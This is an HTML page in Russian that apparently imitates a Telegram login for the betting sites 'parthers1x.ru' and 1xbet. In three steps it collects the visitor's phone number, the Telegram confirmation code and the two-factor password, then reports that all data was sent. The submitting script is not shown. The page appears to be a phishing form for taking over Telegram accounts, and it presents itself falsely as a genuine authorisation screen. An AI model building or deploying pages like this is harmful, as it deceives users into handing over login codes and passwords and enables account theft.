<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>

<div class="header">
    <div class="header-icons">
        <img class="telegram" src="telegram.jpg">
        <img class="bet" src="1xbet.png">
    </div>
    <div class="header-title">
        <h1>Авторизируйтесь, чтобы использовать свой<br> аккаунт Telegram на <blue>сайтах</blue> <br> parthers1x.ru и <a href="https://1xbet.com/">1xbet</a>.</h1>
        <p>Пожалуйста, введите свой номер телефона в<br><blue>международном формате</blue>, и мы отправим<br> подтверждающее сообщение на ваш аккаунт через<br> Telegram.</p>
    </div>
    <form class="form">

        <div class="one">
            <div class="header-text">
                <p>Для входа в ваш аккаунт, нужно<br> ввести номер телефона.</p>
            </div>
            <input id="teleghone" type="tel" list="num" placeholder="Номер">
            <datalist id="num">
                <option value="+7" label="Россия">
                <option value="+380" label="Украина">
                <option value="+375" label="Беларусь">
            </datalist>
            <div class="btn prev-one"><a>Следующее</a></div>
        </div>

        <div class="two">
            <div class="header-text">
                <p>Мы отправили код в приложении<br> <bold>Telegram</bold> на другом вашем устройстве</p>
                <p>Пожалуйста, введите код ниже.</p>
                <span><input id="code" type="text" placeholder="Введите ваш код"></span>
            </div>
            <div class="btns">
                <div class="btn back-two"><a>Назад</a></div>
                <div class="btn prev-two"><a>Следующее</a></div>
            </div>
        </div>

        <div class="three">
            <input id="password" type="password" placeholder="Пароль">
            <div class="header-text">
                <p>Вы включили двухэтапную<br> аутентификацию, поэтому ваша учетная<br> запись защищена дополнительным<br> паролем.</p>
                <span><input type="password" id="repeatPassword" placeholder="Твой пароль"></span>
            </div>
            <div class="btns">
                <div class="btn back-three"><a>Назад</a></div>
                <input type="submit" class="btn submit">
            </div>
        </div>

    </form>
    <div class="close">
        <p>Все данные успешно отправлены!</p>
    </div>
</div>

<script src="index.js"></script>

</body>
</html>